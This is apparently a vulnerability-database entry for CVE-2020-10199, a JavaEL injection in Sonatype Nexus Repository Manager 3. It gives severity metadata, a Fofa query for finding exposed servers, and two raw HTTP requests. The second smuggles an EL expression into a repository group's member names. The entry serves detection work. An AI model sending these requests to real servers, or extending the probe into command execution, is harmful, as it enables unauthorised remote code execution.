| Title | Sonatype Nexus Repository Manager 3 - Remote Code Execution |
|---|---|
| Author | rootxharsh,iamnoooob,pdresearch |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3. |
| CVSS Score | 8.8 |
| EPSS Score | 0.94379 |
| CVE ID | CVE-2020-10199 |
| CWE ID | CWE-917 |
| Fofa Query | title="nexus repository manager" |
| Tags | cve2020 cve packetstorm sonatype nexus rce kev vkev vuln |
Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
POST /service/rapture/session HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
username=eEp6TmNN&password=cTVtVlN5SXI=
POST /service/rest/beta/repositories/bower/group HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Connection: close
Content-Length: 162
Content-Type: application/json
Cookie: NX-ANTI-CSRF-TOKEN=1
NX-ANTI-CSRF-TOKEN: 1
Accept-Encoding: gzip
{"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10199.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-10199.pcap
N/AN/A